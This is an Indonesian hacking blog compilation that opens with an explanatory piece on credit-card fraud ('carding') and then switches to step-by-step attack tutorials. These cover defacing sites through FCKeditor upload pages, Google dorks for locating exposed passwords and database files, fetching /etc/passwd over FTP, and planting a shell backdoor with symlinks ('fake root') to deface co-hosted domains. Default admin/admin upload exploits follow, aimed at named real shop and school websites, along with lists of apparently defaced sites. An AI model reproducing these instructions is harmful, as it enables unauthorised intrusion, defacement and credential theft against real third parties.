Salam hangat pembaca, berjumpa kembali di blog Cyber Hacker Kediri, pada kesempatan kali ini penulis akan sedikit menyinggung tentang carding!
    mungkin dari sebagian pembaca masih asing dengan istilah ini, disini penulis akan menjelaskan apa itu carding dan bagaimana carding ini sendiri berjalan.
    Carding adalah salah satu tindak kejahatan yang sering dilakukan di media komunikasi elektronik atau sering dikenal dengan internet, CyberCrime(kejahatan dunia maya), seperti kita ketahui bahwa tingkat pemakaian kartu kredit di indonesia sangat berkembang pesat bahkan di tahun 2007 tercatat jumlah pemegang kartu kredit mencapai 9,14 juta,  anda bisa melihat rangkumannya disini, maka dari itu sangat perlu kita waspadai juga tangan-tangan nakal yang siap menguras habis isi kartu kredit anda.
    ditinjau dari lain pihak, di negara-negara bagian asia, indonesia khususnya saat ini sudah memiliki suatu hukum baru perkenaan dengan dunia TI, atau juga dikenal dengan hukum siber(cyber law) atau hukum telematika, yaitu UU ITE (Informasi dan Transaksi Elektronik) No.11 tahun 2008.
    carding adalah tindak kejahatan yang bersifat illegal interception, kemudian mengoperasikan kartu kredit tanpa adanya fisik, kartu tersebut lalu digunakan untuk berbelanja di merchant(toko) online, online shop.
    perlu pembaca garis bawahi bahwasannya kartu kredit adalah merupakan alat pembayaran yang sah, namun kartu kredit tidak memiliki jaminan (unsecured loan) yang diberikan oleh bank penerbit kepada nasabah bank karena kredibilitas yang bersangkutan. Pengaturan kartu kredit mengacu pada ketentuan Bank Indonesia dan juga kebijakan masing-masing bank (self-regulatory bank). Oleh karena itu dalam prakteknya bank akan memberikan pengaturan yang menyangkut pedoman kerja bagi semua pejabat yang berwenang terhadap perkreditan dalam mengelola bisnis, sehingga tercapai keseimbangan antara kuantitas dan kualitas dalam portofolio dan risiko kredit.


    hal-hal yang harus kita ketahui sebagai pengguna kartu kredit.

    Electronic Commerce Transaction adalah Transaksi jual beli barang/jasa melalui media komunikasi elektronik atau yang sering dikenal dengan internet, dimana tidak terjadi pertemuan secara langsung antara penjual (merchant/toko) dengan pembeli (pemegang kartu).

    (Gambar diatas adalah alur transaksi kartu kredit)

    adapun jenis transaksi kartu kredit bisa dibedakan menjadi 2 hal yaitu.

    Card Present Transaction, adalah suatu transaksi yang dilakukan secara terang-terangan antara penjual dan pembeli, sama seperti sistem COD "Cash on Delivery" yang dilakukan oleh dua pelaku yaitu penjual dan pembeli secara langsung (face to face transaction).

    Card-Absent (Non-Present) Transaction, adalah transaksi kartu kredit
    secara tidak langsung (tanpa keberadaan Pemegang kartu dan fisik kartu kredit).


    Lalu bagaimana modus, serta cara yang sering di gunakan oleh para carder(pelaku carding) ? mungkin pertanyaan itu yang sekarang ini mulai menyelimuti pikiran anda,? tentu bukan!
    saya akan mencoba menjelaskan dan memberi gambaran bagaimana carding ini dijalankan oleh seoarang carder(pelaku carding).
    Carding sendiri merupakan bagian cyber crime dalam transaksi perbankan yang menggunakan sarana internet sebagai basis transaksi khususnya sistem layanan perbankan online (online banking). Terjadinya carding oleh pelaku (carder) dengan cara memperoleh data kartu kredit secara tidak sah dengan memanfaatkan teknologi informasi (Internet)
    yaitu menggunakan nomor kartu kredit orang lain untuk melakukan pemesanan barang secara online. Komunikasi awalnya dibangun melalui e-mail untuk menanyakan kondisi barang dan melakukan transaksi. Carding adalah transaksi fraud (penyimpangan) pelaku (fraudster) tidak harus memegang fisik dari kartu kredit. Seorang carder hanya memerlukan nomor kartu kredit dan beberapa informasi seperti expiry date dan CVC (Card Verification Code). Dalam industri kartu kredit, pihak bank penerbit mengenal carding sebagai tindakan Card Not Present (CNP) yang bisa berakibat pada penyimpangan (fraud) transaksi baik yang terjadi secara on-line dalam e-commerce maupun transaksi ritel off line.

    Para carder juga tidak akan pernah kehabisan akal untuk selalu mencari celah, ketika penyelenggara mulai meningkatkan fitur keamanan dari kemungkinan timbulnya tindak kejahatan, para carder pun mencari celah melalui transaksi berbasis elektronik yang menggunakan email maupun website untukberbelanja online yang kerap mengharuskan para pemegang kartu untuk memberikan identitas mereka. Pada gilirannya pencurian identitas pada transaksi online meningkat. Dan ketika para penyelenggara memfokuskan pada peningkatan keamanan untuk berbelanja online, maka penyimpangan pada proses
    penyampaian kartu dan aktivasinya meningkat. Menyangkut hal ini dalam industri kartu kredit terdapat kategori-kategori yang sering dilakukan oleh para carder, diantaranya :

    Fraudulent Applications (FA)
    Jenis fraud(penyimpangan) yang dilakukan fraudster
    yang berpura-pura sebagai calon pemegang kartu asli dengan cara
    memberikan data-data identitas palsu pada saat pengisian formulir
    pengajuan kartu baik itu kartu kredit, ATM, dan Debet.

    Lost and Stolen Cards. Setelah dicuri, biasanya carder memakai
    kartu (biasanya kartu kredit atau kartu debit) untuk melakukan
    pembelanjaan dengan nilai yang relative kecil tapi secara berangsur, bahkan sering. Hal ini bertujuan untuk mengurangi resiko si korban mengetahui bahwa kartu kredit telah dikuasai oleh carder, namun pada akhirnya sepandai-pandai tupai meloncat pasti akan terjatuh, peribahasa tersebut nampaknya pas untuk ditujukan kepada para pelaku carding.

    Unauthorized Use of Account Numbers (CARDING). Hampir sama
    dengan jenis penyimpangan yang sudah-sudah. Dalam hal ini carder menggunakan kartu yang bukan miliknya untuk melakukan pembelanjaan melalui mekanisme transaksi yang tidak membutuhkan keberadaaan kartu (card not present) dan transaksi bersifat online.

    Account Takeover. jenis ini dilakukan oleh carder dengan cara
    mengubah identitas pemilik kartu seperti alamat yang terdaftar pada
    kartu yang telah ada sebelumnya. Seperti halnya sebuah salah satu teknik cracking yaitu "Spoofing/pemalsuan"

    Not Received Items (NRI). Apakah teman-teman pembaca pernah mengajukan permohonan untuk memiliki kartu kredit tapi kartu tersebut tidak pernah sampai ke tangan Anda? Bisa jadi kartu atas nama Anda telah
    di tangan carder. penyimpangan yang mungkin terjadi dan dikenal dengan istilah Not Received Items (NRI). Pelaku bisa saja adalah orang dalam maupun orang luar yang mendapatkan informasi mengenai pengiriman kartu.

    Counterfeit Cards and Skimming. Jenis ini yang paling banyak
    terjadi dan mekanismenya lebih canggih dibandingkan dengan penyimpangan jenis lain. Fraud(penyimpangan) jenis ini biasanya lebih sering terjadi pada kartu yang masih menggunakan magnetic stripe sebagai media penyimpan data.

    Phising. Seiring kemajuan teknologi khususnya di internet, seperti kita ketahui phising adalah sebuah teknik dimana seorang carder membuat halaman yang sama persis dengan halaman awal"halaman login palsu" yang terkesan sulit dibedakan dengan situs asli.
    bukan tidak mungkin lagi, jika anda terpancing oleh hal ini. maka isi keseluruhan kartu kredit anda akan dikuras habis oleh carder.

    Mungkin hanya itu yang bisa penulis bagikan kepada teman-teman pembaca blog Cyber Hacker Kediri, semoga apa yang ditulis dan apa yang anda baca sekarang ini menjadi sebuah ilmu baru yang bermanfaat. jangan jadikan hal ini untuk perbuatan yang kurang baik. wassalaam




    - Oke pada kesempatan kali ini saya akan membagikan sebuah trik bagaimana cara deface web dengan fckeditor.



    Pertama tama Silahkan Google Dork ini :
    inurl:fckeditor/editor/filemanager/upload



    Maka akan Muncul beberapa website :


    Gue dah temuin web yang vuln yaitu :
    http://www.dulam.com/includes/FCKeditor/editor/filemanager/upload/test.html

    setelah menemukan target silahkan klik test.html

     Ganti ASP dengan PHP .


    Klik Browse dan pilih file yang akan loe upload !!













    Kalau sudah Klik "Send it to the server" . . . .











    Berhasil dah !!








    Di kolom "Uploaded File URL:" akan muncul tempat file yang loe upload tadi !!
    Contoh punya gue :
    /editor_files/Imagetested(3).html

    Cara lihat file nya gini :
    www.alamat_target_mu.com/editor_files/Imagetested(3).html
    Contoh punya gue :
    http://www.dulam.com/editor_files/Imagetested(3).html

    Selamat Mencoba ^_^

    Kalau masih bingung hubungi gue di Facebook :
    Mr. /Dark_r00t<?

    Hal pertama dari yang harus di ketahui adalah Google Query Operators
    Query operator ini berfungsi kasar sebagai filtering search nya google menjadi lebih spesifik berdasarkan query yang kita inginkan, masing masing query memiliki fungsi sendiri sendiri. berikut keterangan dan contoh nya :

    site
    memfilter berdasarkan domain yang ada
    contoh: site:google.com fox —> akan mencari kata fox di situs google.com

    intitle
    Memfilter dokumen yang memiliki title yang spesifik
    contoh: intitle:fox fire —> akan mencari semua site yang ada kata fox dan didalamnya terdapat teks fire

    allintitle
    Memfilter dokumen untuk mencari intitle intile
    contoh: allintitle:fox fire —> akan mencari semua site yang memiliki title fox dan yang memiliki title fire atau = intitle:fox intitle:fire

    inurl
    Memfilter pencarian dengan url yang spesifik
    contoh: inurl:fox fire —> akan mencari kata fire di website yang url nya terdapat fox

    allinurl
    Sama dengan Allintitle (hanya ini url)

    filetype, ext
    Memfilter pencarian untuk dokumen yang spesifik
    contoh: filetype:pdf fire —> akan mencari file PDF yang didalamnya terdapat kata fire

    contoh keren: filetype:doc skripsi IT

    numrange
    Memfilter dokumen berdasarkan range tertentu
    contoh: numrange:1-100 fire —> akan mencari range 1-100 yang terdapat kata fire

    link
    Memfilter site site yang memiliki link terhadap site tertentu
    contoh: link:www.google.com —> akan mencari site site mana aja yang memiliki links ke google.com

    inanchor
    Memfilter berdasarkan site description yang ada
    contoh: inanchor:fire —> akan mencari web yang memiliki deskripsi fire

    kira kira itulah query query google yang keren keren, sisanya ada sih, seperti:
    / * – + “” ( ya ini regular ekspression biasa kan, jadi ngga perlu di jelaskan lebih detail )

    nah, dari situ, kia bisa kreasikan ke berbagai macam jenis query untuk memfilter sesuatu, bahkan ke sesuatu yang lebih dalam, misalnya file database……

    Web Server
    untuk mencari target dengan mudah dilakukan google dengan menggunakan sintaks berikut ini:
    “Apache/1.3.28 Server at” intitle:index.of
    –> Apache 1.3.28

    “Apache/2.0 Server at” intitle:index.of
    –> Apache 2.0

    “Apache/* Server at” intitle:index.of
    –> semua versi dari Apache

    “Microsoft-IIS/4.0 Server at” intitle:index.of
    –> Microsoft Internet Information Services 4.0

    “Microsoft-IIS/5.0 Server at” intitle:index.of
    –> Microsoft Internet Information Services 5.0

    “Microsoft-IIS/6.0 Server at” intitle:index.of
    –> Microsoft Internet Information Services 6.0

    “Microsoft-IIS/* Server at” intitle:index.of
    –> semua versi dari Microsoft Internet Information Services

    “Oracle HTTP Server/* Server at” intitle:index.of
    –> semua versi dari Oracle HTTP Server

    “IBM _ HTTP _ Server/* * Server at” intitle:index.of
    –> semua versi dari IBM HTTP Server

    “Netscape/* Server at” intitle:index.of
    –> semua versi dari Netscape Server

    “Red Hat Secure/*” intitle:index.of
    –> semua versi dari the Red Hat Secure server

    “HP Apache-based Web Server/*” intitle:index.of
    –> semua versi dari the HP server

    Beberapa Bug pada Skripts dapat ditemukan google:
    “Generated by phpSystem”
    –> dapat menemukan operating system type and version, hardware configuration, logged users, open connections, free memory dan disk space, mount points

    “This summary was generated by wwwstat”
    –> web server statistics, system file structure

    “These statistics were produced by getstats”
    –>web server statistics, system file structure

    “This report was generated by WebLog”
    –>web server statistics, system file structure

    intext:”Tobias Oetiker” “traffic analysis”
    –>system performance statistics as MRTG charts, network configuration

    intitle:”Apache::Status” (inurl:server-status | inurl:status.html | inurl:apache.html)
    –>server version, operating system type, child process list,current connections

    intitle:”ASP Stats Generator *.*” ”
    –>ASP Stats

    Generator” “2003-2004 weppos”
    –>web server activity, lots of visitor information

    intitle:”Multimon UPS status page”
    –>UPS device performance statistics

    intitle:”statistics of” “advanced web statistics”
    –>web server statistics, visitor information

    intitle:”System Statistics” +”System and Network Information Center”
    –>system performance statistics as MRTG charts, hardware configuration, running services

    intitle:”Usage Statistics for” “Generated by Webalizer”
    –>web server statistics, visitor information, system file structure

    intitle:”Web Server Statistics for ****”
    –>web server statistics, visitor information

    inurl:”/axs/ax-admin.pl” -script
    –>web server statistics, visitor information

    inurl:”/cricket/grapher.cgi”
    –>MRTG charts of network interface performance

    inurl:server-info “Apache Server Information”
    –>web server version and configuration, operating system type, system file structure

    “Output produced by SysWatch *”
    –>operating system type and version, logged users, free memory and disk space, mount points, running processes,system logs

    Error message queries
    Salah satu kumpulan error message query, dapat ditemukan sehingga kita bisa mulai melakukan hacking pada tahap selanjutnya.

    “A syntax error has occurred” filetype:ihtml
    –>Informix database errors, berpotensial untuk mengambil function names, filenames, file structure information, pieces of SQL code and passwords

    “Access denied for user” “Using password”
    –>authorisation errors, berpotensial untuk mengambil user names, function names, file structure information and pieces of SQL code

    “The script whose uid is ” “is not allowed to access”
    –>access-related PHP errors, berpotensial untuk mengambil filenames, function names and file structure information

    “ORA-00921: unexpected end of SQL command”
    –>Oracle database errors, berpotensial untuk mengambil filenames, function names and file structure information

    “error found handling the request” cocoon filetype:xml
    –>Cocoon errors, berpotensial untuk mengambil Cocoon version information, filenames, function names and file structure information

    “Invision Power Board Database Error”
    –>Invision Power Board bulletin board errors, berpotensial untuk mengambil function names, filenames, file structure information and piece of SQL code

    “Warning: mysql _ query()” “invalid query”
    –>MySQL database errors, berpotensial untuk mengambil user names, function names, filenames and file structure information

    “Error Message : Error loading required libraries.”
    –>CGI script errors, berpotensial untuk mengambil information about operating system and program versions, user names, filenames and file structure information

    “#mysql dump” filetype:sql
    –>MySQL database errors, berpotensial untuk mengambil informasi database structure dan contents

    Google queries untuk mencari lokasi passwords
    kumpulan secara garis besar lokasi password sebuah sistem yang dapat diakses oleh google

    “http://*:*@www”
    site passwords for site, stored as the string

    “http://username: password@www…” filetype:bak inurl:”htaccess|passwd|shadow|ht users”
    file backups, berpotensial untuk mengambil user names and passwords

    filetype:mdb inurl:”account|users|admin|administrators|passwd|password”
    mdb files, berpotensial untuk mengambil password information

    intitle:”Index of” pwd.db
    pwd.db files, berpotensial untuk mengambil user names and encrypted passwords

    inurl:admin inurl:backup intitle:index.of
    directories whose names contain the words admin and backup

    “Index of/” “Parent Directory” “WS _ http://FTP.ini” filetype:ini WS _ FTP PWD
    WS_FTP configuration files, berpotensial untuk mengambil FTP server access passwords

    ext:pwd inurl:(service|authors|administrators|users) “# -FrontPage-”
    Terdapat Microsoft FrontPage passwords

    filetype:sql (“passwd values ****” |”password values ****” | “pass values ****” )
    Terdapat SQL code and passwords yang disimpan dalam a database

    intitle:index.of trillian.ini
    configuration files for the Trillian IM

    eggdrop filetype:user
    user configuration files for the Eggdrop ircbot

    filetype:conf slapd.conf configuration files for OpenLDAP

    inurl:”wvdial.conf” intext:”password” configuration files for WV Dial

    ext:ini eudora.ini configuration files for the Eudora mail client

    filetype:mdb inurl:users.mdb
    Microsoft Access files, berpotensial untuk mengambil user account information

    intext:”powered by Web Wiz Journal”
    websites using Web Wiz Journal, which in its standard configuration allows access to the passwords file – just enter http:///journal/journal.mdb instead of the default http:///journal/

    “Powered by DUclassified” -site:duware.com
    “Powered by DUcalendar” -site:duware.com
    “Powered by DUdirectory” -site:duware.com
    “Powered by DUclassmate” -site:duware.com
    “Powered by DUdownload” -site:duware.com
    “Powered by DUpaypal” -site:duware.com
    “Powered by DUforum” -site:duware.com
    intitle:dupics inurl:(add.asp | default.asp |view.asp | voting.asp) -site:duware.com
    websites yang menggunakan DUclassified, DUcalendar, DUdirectory, DUclassmate, DUdownload, DUpaypal, DUforum or DUpics applications, secara default memungkinkan kita untuk mengambil passwords file
    – untuk DUclassified, just enter http:///duClassified/ _private/duclassified.mdb
    atau http:///duClassified/

    intext:”BiTBOARD v2.0″ “BiTSHiFTERS Bulletin Board”
    website yang menggunakan Bitboard2 bulletin board, secara default settings memungkinkan kita untuk mengambil passwords file to be obtained
    – dengan cara http:///forum/admin/data _ passwd.dat
    atau http:///forum/forum.php

    Mencari Dokumen khusus ?
    filetype:xls inurl:”email.xls” email.xls
    files, berpotensial untuk mengambil contact information

    “phone * * *” “address *” “e-mail” intitle:”curriculum vitae”
    CVs

    “not for distribution”
    confidential documents containing the confidential clause

    buddylist.blt
    AIM contacts list

    intitle:index.of mystuff.xml
    Trillian IM contacts list

    filetype:ctt “msn”
    MSN contacts list

    filetype:QDF
    QDF database files for the Quicken financial application

    intitle:index.of finances.xls
    finances.xls files, berpotensial untuk mengambil information on bank accounts, financial summaries and credit card numbers

    intitle:”Index Of” -inurl:maillog maillog size maillog files, berpotensial untuk mengambil e-mail

    “Network Vulnerability Assessment Report”
    “Host Vulnerability Summary Report”
    filetype:pdf “Assessment Report”
    “This file was generated by Nessus”
    reports for network security scans, penetration tests etc. On the Net



    Berikut ini adalah cara menghack menggunakan Windows, yang digunakan untuk mendapatkan password file dari sebuah shell.Cara ini menggunakan ftp protocol.Kebanyakan paswordnya id sembunyikan /shadowed, tapi kamu masih bisa mendapatkannya dg meng-finger atau menebak passwordnya untuk loginnya.
    Kamu dapat memulainya dg membuka/memasuki sebuah shell, dan kamu tidak perlu/tidak harus menggunakan/ berada didalam sebuah ftp server.berikut langkah langkahnya :

    1.jalankan prompt
    2.Tuliskan command untuk membuka dos command prompt
    3.tuliskan ftp victim.com (nama server yg ingin di hacking !!)

    4.Akan muncul prompt login.. tekan enter saja (tidak perlu menuliskan apa apa)
    5.Akan muncul password login.. tekan saja enter…
    6.sekarang ketiklah “quote user ftp” dan tekan enter
    7.lalu ketik “quote cwd ~root” tekan enter
    8.dan ketikan “quote pass ftp” tekan enter
    Sekarang kamu sudah memiliki guest access dan dapat mendownload password file.. and have a fuckin’ shit with that
    9.ketiklah “cd etc” tekan enter.. untuk mendapatkan -etc directory- yg berisi file password
    10.ketiklah “get passwd” untuk mendownload passw.file ke HD mu

    Dengan demikian kita sudah memiliki password file dari victim dan kita dapat membukanya di C:\passwd dengan menggunakan notepad
    Jika file tersebut di enkripsi.. kamu bisa meng-crack.. dan jika tidak dienkripsi..berarti anda berhasil
    kamu dapat mencocokan antara user login dg passwordnya.

    Fake root .. Apa itu Fake root ..? sudah bisa kita telaah bahwasanya Fake berarti palsu .
    Oke pada kesempatan kali ini saya akan membahas tentang tata cara dan bagaimana Fake root Itu sendiri di eksekusi/di jalankan pada satu server .
    hal pertama yang anda lakukan adalah memasuki dulu sebuah website dengan cara entah apapun bisa menggunakan : sql inject , brute Force dll
    saya disini memberi contoh anda jika anda sudah berhasil memasuki isi web tersebut .

    Adapun hal selanjutnya sebagai berikut :

    1 . Tanam shell backdoor anda di folder public_html usahakan di folder tersebut , lalu buka shell yang sudah anda tanam tadi dengan keyword public_html/namashellanda.php (www.siteanda.com/namashellanda.php)

    2. buatlah suatu File deface sesuai nama yang anda inginkan di public_html/namfile.html (siteanda.com/namafile.html)

    3 . Disini saya memberi contoh anda dengan shell injection v3.3 jika anda belum punya anda bisa mendownloadnya disini

    4 . jika sudah anda memasang shell nya , sekarang mulailah lah menuju Symlink

     dan domain list untuk mengecek seberapa banyak domain yang terlibat antara domain yang sudah anda berhasil masuki tadi .
    5 . Saatnya kita mengecek hasil Fake root kita dengan keyword www.websiteyangtersangkutserver.com/~usernamewebsiteyang1dimasuki/namaFile.html


    Contoh Fake Root :

    http://eiffelhotel.com.ar/~micais/index.html
    http://aeroglobal.com.ar/~micais/index.html
    http://aeromentor.com.ar/~micais/index.html
    http://agroaereos.com.ar/~micais/index.html
    http://infraero.com.ar/~micais/index.html
    http://aeropymes.com.ar/~micais/index.html
    http://aeroargentina.com/~micais/index.html
    http://asistenciaexpress.com/~micais/index.html
    http://desarrollos-electronicos.com/~micais/index.html
    http://aldomontev.com.ar/~micais/index.html
    http://vdevoto.com/~micais/index.html
    http://ipmeducar.com.ar/~micais/index.html
    http://diswald.com/~micais/index.html
    http://domenech.com.ar/~micais/index.html
    http://alterd.com.ar/~micais/index.html
    http://chocolonea.com.ar/~micais/index.html
    http://marianochocolonea.com.ar/~micais/index.html
    http://esteticayvida.com.ar/~micais/index.html
    http://esteticayvida.com/~micais/index.html
    http://ciencia-tecnica.com.ar/~micais/index.html
    http://citypet.com.ar/~micais/index.html
    http://arquigreen.com/~micais/index.html
    http://colegiosanmarcelo.com.ar/~micais/index.html
    http://cositmecos.org.ar/~micais/index.html
    http://cuplasjac.com.ar/~micais/index.html
    http://daloia.com.ar/~micais/index.html
    http://darex.com.bo/~micais/index.html
    http://guiadelocutores.com.ar/~micais/index.html
    http://daylunch.com/~micais/index.html




    Sebenarnya cara ini tidak begitu sulit di praktekan , tapi untuk sekedar belajar tak apalah . pas untuk yang masih newbie pengen belajar . oke langsung aja . tugas anda adalah sedikit mengexploit web target
    dan mengupload file anda melalui photo gallery .

    1. Dork in google : intext:”Powered by shop737” or ''Powered by bisnis 7'' => kembangin lagi dorknya, semakin kreatif kamu, semakin banyak target yang didapat


    Pilih 1 website target, masukkan exploit ini

    exploit:
    poto/upload.php


    masukan
    username : admin
    password : admin

    2. lalu carilah tempat mengupload file anda , seperti di gambar bawah



    3 . buatlah kategory dengan nama yang anda inginkan contoh : Ambu
    keterangan kategory : menurut keinginan anda  lalu klik upload tapi disini hanya mendukung file jpg , png , txt

    4. untuk menemukan dimana file anda terupload anda bisa mencarinya disini http://www.contoh.com/poto/index.php?imgdir=namakategoryamda

    example : http://www.bahteragunajaya.com/poto/index.php?imgdir=Ambu
    perlu di ingat : tidak semua web bisa dengan tutorial ini , carilah target dengan sabar !!!


    Dork :

    inurl:/html/siswa.php?
    inurl:/html/alumni.php?
    inurl:/html/guru.php?

    DORK bisa dikembangan menurut kreatifitas anda .


    Exploit :

    http://public_html/dir/editor/filemanager/connectors/uploadtest.html atau http://public_html/dir/editor/filemanager/connectors/test.html  , http://public_html/editor/filemanager/browser/default/browser.html

    pilih salah satu, kalau sudah langsung masukan exploitnya lalu pilih connector nya dari ASP => PHP tinggal masukin filenya harus berbentuk .TXT  Seperti gambar diatas .

    Demo:
    http://www.sman1kotabaru.sch.id/editor/filemanager/connectors/uploadtest.html

    http://www.smppd1bpp.com/editor/filemanager/connectors/uploadtest.html
    http://smp1kudus.sch.id/editor/filemanager/connectors/uploadtest.html

    Terakhir klik send it to server . untuk melihat file txt anda tadi bisa dengan cara http://contoh.com/userfiles/filename.txt

    example : http://smp1kudus.sch.id/userfiles/ambu_.txt

    jika muncul pesan : File not error , berarti file anda behasil di upload jika tidak . carilah target yang lain


Top